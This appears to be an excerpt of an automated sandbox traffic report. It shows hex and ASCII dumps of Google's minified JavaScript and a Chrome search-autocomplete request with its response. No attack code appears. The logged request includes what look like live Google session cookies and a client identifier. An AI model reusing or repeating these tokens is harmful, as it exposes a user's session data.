                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 61 2c 45 63 61 2c 46 63 61 2c 47 63 61 2c 41 63 61 2c 48 63 61 2c 42 63 61 2c 49 63 61 2c 7a 63 61 2c 4a 63 61 2c 79 63 61 2c 4b 63 61 2c 4d 63 61 2c 54 63 61 2c 56 63 61 2c 57 63 61 2c 24 63 61 2c 61 64 61 2c 65 64 61 2c 68 64 61 2c 62 64 61 2c 67 64 61 2c 66 64 61 2c 64 64 61 2c 63 64 61 2c 69 64 61 2c 6a 64 61 2c 6e 64 61 2c 70 64 61 2c 6f 64 61 2c 73 64 61 2c 74 64 61 2c 75 64 61 2c 77 64 61 2c 79 64 61 2c 78 64 61 2c 41 64 61 2c 42 64 61 2c 43 64 61 2c 45 64 61 2c 46 64 61 2c 47 64 61 2c 48 64 61 2c 49 64 61 2c 4c 64 61 2c 4d 64 61 2c 4e 64 61 2c 52 64 61 2c 51 64 61 2c 55 64 61 2c 56 64 61 2c 24 64 61 2c 61 65 61 2c 62 65 61 2c 64 65 61 2c 63 65 61 2c 66 65 61 2c 65 65 61 2c 69 65 61 2c 68 65 61 2c 6b 65 61 2c 6d 65 61 2c 70 65 61 2c 71 65 61 2c 74
                                                                                                                                                                                                                                                                                          Data Ascii: a,Eca,Fca,Gca,Aca,Hca,Bca,Ica,zca,Jca,yca,Kca,Mca,Tca,Vca,Wca,$ca,ada,eda,hda,bda,gda,fda,dda,cda,ida,jda,nda,pda,oda,sda,tda,uda,wda,yda,xda,Ada,Bda,Cda,Eda,Fda,Gda,Hda,Ida,Lda,Mda,Nda,Rda,Qda,Uda,Vda,$da,aea,bea,dea,cea,fea,eea,iea,hea,kea,mea,pea,qea,t
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 53 74 61 63 6b 54 72 61 63 65 29 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 74 68 69 73 2c 5f 2e 61 61 29 3b 65 6c 73 65 7b 76 61 72 20 63 3d 45 72 72 6f 72 28 29 2e 73 74 61 63 6b 3b 63 26 26 28 74 68 69 73 2e 73 74 61 63 6b 3d 63 29 7d 61 26 26 28 74 68 69 73 2e 6d 65 73 73 61 67 65 3d 53 74 72 69 6e 67 28 61 29 29 3b 62 21 3d 3d 76 6f 69 64 20 30 26 26 28 74 68 69 73 2e 63 61 75 73 65 3d 62 29 7d 3b 5f 2e 61 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 25 73 22 29 3b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 61 2e 6c 65 6e 67 74 68 2d 31 2c 65 3d 30 3b 65 3c 64 3b 65 2b 2b 29 63 2b 3d 61 5b 65 5d 2b 28 65 3c 62 2e 6c 65 6e 67 74 68 3f 62 5b 65 5d 3a 22 25 73 22 29 3b 5f 2e 61 61 2e
                                                                                                                                                                                                                                                                                          Data Ascii: StackTrace)Error.captureStackTrace(this,_.aa);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));b!==void 0&&(this.cause=b)};_.aaa=function(a,b){a=a.split("%s");for(var c="",d=a.length-1,e=0;e<d;e++)c+=a[e]+(e<b.length?b[e]:"%s");_.aa.
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 61 3d 76 6f 69 64 20 30 29 3b 74 68 72 6f 77 20 66 3b 7d 7d 3b 0a 5f 2e 6c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 62 3b 69 66 28 69 61 61 29 7b 69 66 28 62 26 26 28 6a 61 61 3f 21 61 2e 69 73 57 65 6c 6c 46 6f 72 6d 65 64 28 29 3a 2f 28 3f 3a 5b 5e 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 7c 5e 29 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 7c 5b 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 28 3f 21 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 29 2f 2e 74 65 73 74 28 61 29 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4f 22 29 3b 61 3d 28 6b 61 61 7c 7c 28 6b 61 61 3d 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 29 29 2e 65 6e 63 6f 64 65 28 61 29 7d 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 63 3d 30
                                                                                                                                                                                                                                                                                          Data Ascii: a=void 0);throw f;}};_.laa=function(a,b){b=b===void 0?!1:b;if(iaa){if(b&&(jaa?!a.isWellFormed():/(?:[^\uD800-\uDBFF]|^)[\uDC00-\uDFFF]|[\uD800-\uDBFF](?![\uDC00-\uDFFF])/.test(a)))throw Error("O");a=(kaa||(kaa=new TextEncoder)).encode(a)}else{for(var c=0
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 71 61 61 28 29 3f 21 31 3a 5f 2e 69 61 28 22 45 64 67 65 22 29 7d 3b 5f 2e 75 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 71 61 61 28 29 3f 6e 61 61 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 5f 2e 69 61 28 22 45 64 67 2f 22 29 7d 3b 0a 5f 2e 76 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 46 69 72 65 66 6f 78 22 29 7c 7c 5f 2e 69 61 28 22 46 78 69 4f 53 22 29 7d 3b 5f 2e 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 53 61 66 61 72 69 22 29 26 26 21 28 5f 2e 6a 61 28 29 7c 7c 28 5f 2e 71 61 61 28 29 3f 30 3a 5f 2e 69 61 28 22 43 6f 61 73 74 22 29 29 7c 7c 5f 2e 72 61 61 28 29 7c 7c 5f 2e 74 61
                                                                                                                                                                                                                                                                                          Data Ascii: nction(){return _.qaa()?!1:_.ia("Edge")};_.uaa=function(){return _.qaa()?naa("Microsoft Edge"):_.ia("Edg/")};_.vaa=function(){return _.ia("Firefox")||_.ia("FxiOS")};_.la=function(){return _.ia("Safari")&&!(_.ja()||(_.qaa()?0:_.ia("Coast"))||_.raa()||_.ta
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 6c 65 73 73 43 68 72 6f 6d 65 22 5d 29 7d 72 65 74 75 72 6e 20 61 3d 3d 3d 22 46 69 72 65 66 6f 78 22 26 26 5f 2e 76 61 61 28 29 7c 7c 61 3d 3d 3d 22 53 61 66 61 72 69 22 26 26 5f 2e 6c 61 28 29 7c 7c 61 3d 3d 3d 22 41 6e 64 72 6f 69 64 20 42 72 6f 77 73 65 72 22 26 26 5f 2e 78 61 61 28 29 7c 7c 61 3d 3d 3d 22 53 69 6c 6b 22 26 26 5f 2e 77 61 61 28 29 3f 28 61 3d 62 5b 32 5d 29 26 26 0a 61 5b 31 5d 7c 7c 22 22 3a 22 22 7d 3b 5f 2e 42 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 5f 2e 71 61 61 28 29 26 26 61 21 3d 3d 22 53 69 6c 6b 22 29 7b 76 61 72 20 62 3d 5f 2e 65 61 2e 62 72 61 6e 64 73 2e 66 69 6e 64 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 63 2e 62 72 61 6e 64 3d 3d 3d 61 7d 29 3b 69 66 28 21 62 7c 7c 21 62 2e 76 65 72 73
                                                                                                                                                                                                                                                                                          Data Ascii: lessChrome"])}return a==="Firefox"&&_.vaa()||a==="Safari"&&_.la()||a==="Android Browser"&&_.xaa()||a==="Silk"&&_.waa()?(a=b[2])&&a[1]||"":""};_.Baa=function(a){if(_.qaa()&&a!=="Silk"){var b=_.ea.brands.find(function(c){return c.brand===a});if(!b||!b.vers
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 5d 29 3b 72 65 74 75 72 6e 20 62 7c 7c 22 22 7d 3b 0a 5f 2e 4b 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 70 61 28 5f 2e 4a 61 61 28 29 2c 61 29 3e 3d 30 7d 3b 5f 2e 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 7d 3b 5f 2e 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 65 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 65 3e 3d 30 3b 2d 2d 65 29 65 20 69 6e 20 64 26 26 62 2e 63 61 6c 6c 28 63 2c 64 5b 65 5d 2c 65 2c 61 29 7d 3b 5f 2e 4c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 62 3d 5f 2e 73 61 28 61 2c 62 2c 63 29 3b 72 65
                                                                                                                                                                                                                                                                                          Data Ascii: ]);return b||""};_.Kaa=function(a){return _.pa(_.Jaa(),a)>=0};_.qa=function(a){return a[a.length-1]};_.ra=function(a,b,c){for(var d=typeof a==="string"?a.split(""):a,e=a.length-1;e>=0;--e)e in d&&b.call(c,d[e],e,a)};_.Laa=function(a,b,c){b=_.sa(a,b,c);re
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 6d 65 6e 74 73 5b 63 5d 3b 69 66 28 5f 2e 41 61 28 64 29 29 7b 76 61 72 20 65 3d 61 2e 6c 65 6e 67 74 68 7c 7c 30 2c 66 3d 64 2e 6c 65 6e 67 74 68 7c 7c 30 3b 61 2e 6c 65 6e 67 74 68 3d 65 2b 66 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 66 3b 67 2b 2b 29 61 5b 65 2b 67 5d 3d 64 5b 67 5d 7d 65 6c 73 65 20 61 2e 70 75 73 68 28 64 29 7d 7d 3b 5f 2e 55 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 61 70 70 6c 79 28 61 2c 54 61 61 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 29 7d 3b 54 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 32 3f 41 72 72 61 79 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                                                                          Data Ascii: ments[c];if(_.Aa(d)){var e=a.length||0,f=d.length||0;a.length=e+f;for(var g=0;g<f;g++)a[e+g]=d[g]}else a.push(d)}};_.Uaa=function(a,b,c,d){return Array.prototype.splice.apply(a,Taa(arguments,1))};Taa=function(a,b,c){return arguments.length<=2?Array.protot
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 72 61 79 28 64 29 29 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 64 2e 6c 65 6e 67 74 68 3b 65 2b 3d 38 31 39 32 29 7b 76 61 72 20 66 3d 54 61 61 28 64 2c 65 2c 65 2b 38 31 39 32 29 3b 66 3d 5f 2e 63 62 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 66 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 66 2e 6c 65 6e 67 74 68 3b 67 2b 2b 29 62 2e 70 75 73 68 28 66 5b 67 5d 29 7d 65 6c 73 65 20 62 2e 70 75 73 68 28 64 29 7d 72 65 74 75 72 6e 20 62 7d 3b 5f 2e 64 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 66 61 28 5f 2e 64 61 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 77 65 62 6b 69 74 22 29 26 26 21 5f 2e 69 61 28 22 45 64 67 65 22 29 7d 3b 5f 2e 65 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 47
                                                                                                                                                                                                                                                                                          Data Ascii: ray(d))for(var e=0;e<d.length;e+=8192){var f=Taa(d,e,e+8192);f=_.cba.apply(null,f);for(var g=0;g<f.length;g++)b.push(f[g])}else b.push(d)}return b};_.dba=function(){return _.fa(_.da().toLowerCase(),"webkit")&&!_.ia("Edge")};_.eba=function(){return _.ia("G
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 3a 21 31 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 54 22 29 3b 7d 3b 73 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 42 69 67 49 6e 74 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 7d 3b 0a 5f 2e 76 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 62 61 3b 69 66 28 21 75 62 61 28 61 29 29 7b 76 61 72 20 63 2c 64 3b 62 3d 28 64 3d 28 63 3d 74 79 70 65 6f 66 20 62 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 62 28 29 3a 62 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 63 6f 6e 63 61 74 28 22 5c 6e 22 29 29 21 3d 6e 75 6c 6c 3f 64 3a 22 22 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 60 22 2b 62 2b 22 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 7d 3b 5f 2e 77 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b
                                                                                                                                                                                                                                                                                          Data Ascii: :!1};throw Error("T");};sba=function(){return typeof BigInt==="function"};_.vba=function(a){var b=tba;if(!uba(a)){var c,d;b=(d=(c=typeof b==="function"?b():b)==null?void 0:c.concat("\n"))!=null?d:"";throw Error("U`"+b+"`"+String(a));}};_.wba=function(a){


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          34192.168.2.749777142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1369OUTGET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=CsT2Zo-iIaySxc8Pn72EmA8.1727448076583&dpr=1&nolsbt=1 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1305INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:18 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:18 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3600
                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-72NhCVXP3Rublo4R2NoFRQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC85INData Raw: 63 63 61 0d 0a 29 5d 7d 27 0a 5b 5b 5b 22 62 72 61 7a 69 6c 69 61 6e 20 62 6c 69 6d 70 20 63 72 61 73 68 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f
                                                                                                                                                                                                                                                                                          Data Ascii: cca)]}'[[["brazilian blimp crash",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 70 69 74 74 73 62 75 72 67 68 20 73 74 65 65 6c 65 72 73 22 2c 34 36 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 6c 6d 22 3a 5b 5d 2c 22 7a 66 22 3a 33 33 2c 22 7a 68 22 3a 22 50 69 74 74 73 62 75 72 67 68 20 53 74 65 65 6c 65 72 73 22 2c 22 7a 69 22 3a 22 46 6f 6f 74 62 61 6c 6c 20 74 65 61 6d 22 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 70 22 3a 22 65 4a 7a 6a 34 74 44 50 31 54 63 77 4c 55 6e 4c 4e 57 44 30 45 69 37 49 4c 43 6b 70 54 69 6f 74 53 73 39 51 4b 43 35 4a 54 63 31 4a 4c 53 6f 47 41 4a 5f 73 43 75 73 22 7d 2c 22 7a 73 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: ss":"1"}}],["pittsburgh steelers",46,[3,357,362,396,143],{"lm":[],"zf":33,"zh":"Pittsburgh Steelers","zi":"Football team","zl":8,"zp":{"gs_ssp":"eJzj4tDP1TcwLUnLNWD0Ei7ILCkpTiotSs9QKC5JTc1JLSoGAJ_sCus"},"zs":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAA
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 6b 56 2b 44 45 49 30 38 73 54 75 4d 79 50 68 4a 35 69 49 39 4a 4f 4a 2f 2f 34 56 5a 77 4f 6d 2b 55 38 69 41 6d 2b 42 6a 72 2b 79 6b 64 4d 4e 59 6e 33 41 49 63 30 67 72 65 69 74 6a 48 61 6c 46 4b 53 33 42 65 7a 34 54 79 35 56 47 66 4d 79 4c 52 4f 63 35 69 2b 67 5a 72 76 4c 65 6d 2b 6c 53 72 31 74 6d 77 2b 39 7a 72 33 62 50 7a 47 74 5a 35 45 2f 6e 42 44 6d 4e 43 75 49 38 50 35 59 63 61 65 30 6f 39 39 43 56 70 7a 59 6d 49 4f 63 49 6f 69 59 33 6a 52 4c 50 58 68 41 67 66 4f 41 46 37 6b 69 54 31 76 72 44 7a 73 52 48 68 62 43 68 45 63 52 65 62 73 42 4d 4e 36 79 76 47 6b 6a 61 37 30 52 63 31 35 75 55 2b 49 70 52 4f 72 70 69 68 44 76 61 4b 67 78 34 6e 46 65 6f 54 43 77 44 51 74 68 4a 4f 72 68 53 36 59 54 53 2b 50 35 46 69 39 4e 2b 6c 59 2b 51 49 50 45 57 50 30 7a
                                                                                                                                                                                                                                                                                          Data Ascii: kV+DEI08sTuMyPhJ5iI9JOJ//4VZwOm+U8iAm+Bjr+ykdMNYn3AIc0greitjHalFKS3Bez4Ty5VGfMyLROc5i+gZrvLem+lSr1tmw+9zr3bPzGtZ5E/nBDmNCuI8P5Ycae0o99CVpzYmIOcIoiY3jRLPXhAgfOAF7kiT1vrDzsRHhbChEcRebsBMN6yvGkja70Rc15uU+IpROrpihDvaKgx4nFeoTCwDQthJOrhS6YTS+P5Fi9N+lY+QIPEWP0z
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC416INData Raw: 56 33 5a 53 77 6c 68 65 4e 68 36 47 55 70 76 56 64 62 59 68 66 4c 4b 65 79 56 64 42 4c 63 4c 35 69 75 32 4c 59 34 6c 51 32 78 7a 30 48 31 52 4e 7a 63 48 77 33 62 41 4a 4a 77 70 55 43 61 41 79 69 79 63 41 4f 65 76 65 2f 63 52 4c 48 76 6f 42 57 43 36 52 4a 69 43 77 42 76 61 42 30 72 6e 46 30 49 7a 45 46 37 57 2f 2f 38 58 4b 46 4f 53 44 37 41 6a 34 32 6b 41 41 41 41 41 53 55 56 4f 52 4b 35 43 59 49 49 5c 75 30 30 33 64 22 7d 5d 2c 5b 22 72 65 64 20 62 75 6c 6c 20 72 61 63 69 6e 67 20 64 61 6e 69 65 6c 20 72 69 63 63 69 61 72 64 6f 22 2c 34 36 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 6c 6d 22 3a 5b 5d 2c 22 7a 66 22 3a 33 33 2c 22 7a 68 22 3a 22 72 65 64 20 62 75 6c 6c 20 72 61 63 69 6e 67 20 64 61 6e 69 65 6c 20 72 69 63 63 69 61
                                                                                                                                                                                                                                                                                          Data Ascii: V3ZSwlheNh6GUpvVdbYhfLKeyVdBLcL5iu2LY4lQ2xz0H1RNzcHw3bAJJwpUCaAyiycAOeve/cRLHvoBWC6RJiCwBvaB0rnF0IzEF7W//8XKFOSD7Aj42kAAAAASUVORK5CYII\u003d"}],["red bull racing daniel ricciardo",46,[3,357,362,396,143],{"lm":[],"zf":33,"zh":"red bull racing daniel riccia
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC110INData Raw: 36 38 0d 0a 53 38 67 46 4f 42 77 39 31 22 7d 2c 22 7a 73 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 51 41 41 41 51 41 42 41 41 44 2f 32 77 43 45 41 41 6b 47 42 77 67 48 42 67 6b 49 42 77 67 4b 43 67 6b 4c 44 52 59 50 44 51 77 4d 44 52 73 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 68S8gFOBw91"},"zs":"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRs
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC1390INData Raw: 33 39 34 39 0d 0a 55 46 52 41 57 49 42 30 69 49 69 41 64 48 78 38 6b 4b 44 51 73 4a 43 59 78 4a 78 38 66 4c 54 30 74 4d 54 55 33 4f 6a 6f 36 49 79 73 2f 52 44 38 34 51 7a 51 35 4f 6a 63 42 43 67 6f 4b 44 51 77 4e 47 67 38 50 47 6a 63 6c 48 79 55 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 7a 63 33 4e 2f 2f 41 41 42 45 49 41 46 41 41 55 41 4d 42 49 67 41 43 45 51 45 44 45 51 48 2f 78 41 41 63 41 41 41 43 41 67 4d 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 45 42 51 4d 47 41 51 49 48 41 41 6a 2f 78 41 41 35 45 41 41 43 41 51 4d 44 41 51 55 46 42 51 59 48 41 41 41 41 41 41 41 42 41 67 4d 41 42 42 45 46 49 54 45 53
                                                                                                                                                                                                                                                                                          Data Ascii: 3949UFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3N//AABEIAFAAUAMBIgACEQEDEQH/xAAcAAACAgMBAQAAAAAAAAAAAAAEBQMGAQIHAAj/xAA5EAACAQMDAQUFBQYHAAAAAAABAgMABBEFITES
